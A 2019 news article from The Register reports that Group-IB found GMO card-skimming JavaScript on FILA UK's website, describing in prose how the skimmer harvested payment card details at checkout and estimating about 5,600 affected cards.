Sign Up
All SecurityCyber-crimePatchesResearchCSO
All Off-PremEdge + IoTChannelPaaS + IaaSSaaS
All On-PremSystemsStorageNetworksHPCPersonal TechCxOPublic Sector
All SoftwareAI + MLApplicationsDatabasesDevOpsOSesVirtualization
All OffbeatDebatesColumnistsScienceGeek's GuideBOFHLegalBootnotesSite NewsAbout Us

Security

Hackers cop a FILA thousands of UK card deets after slinking onto clothing brand's servers

Pesky JavaScript harvester strikes again

Shaun Nichols in San Francisco Thu 14 Mar 2019  //  14:00 UTC

Updated Sportswear brand FILA is the latest outfit to fall victim to card-stealing JavaScript of the kind that menaced British Airways and Ticketmaster last year.

Russian security house Group-IB said it discovered and reported to FILA UK malware known as GMO that was active on the fashion brand's website for the past four months – and may have sniffed the payment card information of thousands of customers placing online orders through the tainted pages.

What's worse, the researchers reported that, despite multiple attempts to reach FILA, they have been unable to get the card-data-stealing code removed.

FILA did not respond to our request for comment on the allegation.

According to Group-IB's threat hunters, the GMO infection is very similar to the card-harvesting JavaScript nasty MageCart, in that an attacker covertly slips onto the server of the targeted company and installs code onto the business's website to covertly collect card numbers as they are entered by customers. These details are later uploaded to a collection server at a set time. Such attacks can be particularly difficult to detect as they do not produce a steady stream of traffic out of the infected machine.

Card-stealing code that pwned British Airways, Ticketmaster pops up on more sites via hacked JS

READ MORE

In short, don't order anything from FILA online, and if you have, contact your bank and check your statements.

"One-line card stealing code downloads a JavaScript Sniffer once a customer lands on a checkout page, which intercepts credit card data and sends it to local storage. After, the payment cards' details are sent to the JS Sniffer's gate which is located on the same server as a JS Sniffer script itself," said Group-IB CTO Dmitry Volkov.

"Cybercriminals might have injected a malicious code by either exploiting a vulnerability of Magento CMS [content management system], used by FILA.co.uk, or simply by compromising the credentials of the website administrator using special spyware or cracking password with brute force methods," Volkov added.

Just how many customers could have fallen victim to the attack is difficult to say. Group-IB used a loose estimate based on monthly traffic figures and a one per cent conversion rate (ie, 1 per cent of people who visit the site end up buying something) to arrive at an estimated figure of around 5,600 compromised cards.

Group-IB said that FILA is likely not alone in falling victim to this latest variation of JavaScript malware harvesters. The researchers found six other unnamed websites to be similarly infected with the card-stealing scripts, and will be reaching out to US and UK police to help further suss out and stop any active infections. ®

Updated to add

Within hours of this article being published, the GMO JavaScript card sniffer was removed from FILA's website, Group-IB tells us.
Send us news
10 Comments

US House approves FISA renewal – warrantless surveillance and all

PLUS: Chinese chipmaker Nexperia attacked; A Microsoft-signed backdoor; CISA starts scanning your malware; and more

MITRE admits 'nation state' attackers touched its NERVE R&D operation

PLUS: Akira ransomware resurgent; Telehealth outfit fined for data-sharing; This week's nastiest vulns

Head of Israeli cyber spy unit exposed ... by his own privacy mistake

Plus: Another local government hobbled by ransomware; Huge rise in infostealing malware; and critical vulns

Google sues app devs, claims they're Play Store crypto scammers with 100k+ victims

The pair allegedly made 87 apps since 2019 and defrauded folks of tens of thousands of dollars

Software engineer helped put Sam Bankman-Fried behind bars, say prosecutors

CTO shared code from his laptop with investigation after FTX collapsed

OpenAI claims its software can clone your voice from 15 seconds of you talking

Super lab loves to big up things it says it couldn't possibly let loose on the world for now

FTX crypto-crook Sam Bankman-Fried gets 25 years in prison

Could have been worse: Prosecutors wanted decades more

Microsoft confirms memory leak in March Windows Server security update

ALSO: Viasat hack wiper malware is back, users are the number one cause of data loss, and critical vulns

UK tech titan Mike Lynch's US fraud trial begins today

13-year saga continues as jury set to hear claims on both sides of HP's Autonomy acquisition disaster

It's 2024 and North Korea's Kimsuky gang is exploiting Windows Help files

New infostealer may indicate a shift in tactics – and maybe targets too, beyond Asia

ChatGPT side-channel attack has easy fix: Token obfuscation

Also: Roblox-themed infostealer on the prowl, telco insider pleads guilty to swapping SIMs, and some crit vulns

Investment advisors pay the price for selling what looked a lot like AI fairy tales

SEC bags $400K in settlements